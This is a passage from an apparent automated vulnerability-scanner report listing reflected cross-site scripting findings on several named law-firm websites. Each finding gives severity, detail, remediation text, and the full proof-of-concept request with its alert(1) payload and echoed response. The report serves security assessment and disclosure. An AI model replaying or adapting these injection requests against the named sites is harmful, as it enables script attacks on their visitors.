Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:56:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 247989
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?c53e5'-alert(1)-'9529b8f7a51=1';//]]>
...[SNIP]...

2.28. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /privacypolicy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1164; path=/
Set-Cookie: PortletId=1155501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13182


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Privacy Policy</title>
<meta name="language" c
...[SNIP]...
nt.aspnetForm.action = '/privacypolicy/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/privacypolicy/GeneralPageData.aspx?df5e0'-alert(1)-'cd34e2cebf=1';//]]>
...[SNIP]...

2.29. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /probonooverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1148; path=/
Set-Cookie: PortletId=1139501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25101


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Pro Bono | Overview</title>
<meta name="langua
...[SNIP]...
cument.aspnetForm.action = '/probonooverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/probonooverview/ProBono.aspx?eb241'-alert(1)-'14889ea6214=1';//]]>
...[SNIP]...

2.30. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1159; path=/
Set-Cookie: PortletId=1150501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 158249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Publications</title>
<meta name="language" con
...[SNIP]...
DATA[
document.aspnetForm.action = '/publications/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/publications/List.aspx?37aa1'-alert(1)-'7b6396f21de=1';//]]>
...[SNIP]...

2.31. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /recruitingthebestandbrightest

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1153; path=/
Set-Cookie: PortletId=1144501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Recruiting the Best & Brightest</title>
...[SNIP]...
ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]>
...[SNIP]...

2.32. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /retainingourdiversetalent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1154; path=/
Set-Cookie: PortletId=1145501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Retaining Our Diverse Talent</title>

...[SNIP]...
on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]>
...[SNIP]...

2.33. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1163; path=/
Set-Cookie: PortletId=1154501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Site Map</title>
<meta name="language" content
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/sitemap/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/sitemap/Sitemap.aspx?a6862'-alert(1)-'2791e98804b=1';//]]>
...[SNIP]...

2.34. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /termsofuse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=3588901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Terms of Use</title>
<meta name="language" con
...[SNIP]...
document.aspnetForm.action = '/termsofuse/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/termsofuse/GeneralPageData.aspx?ce89f'-alert(1)-'5ebc528209d=1';//]]>
...[SNIP]...

2.35. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'>
...[SNIP]...

2.36. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<350)
{
   location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True'
}

</script>
...[SNIP]...

2.37. http://www.fulbright.com/index.cfm [eTitle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24113095;path=/
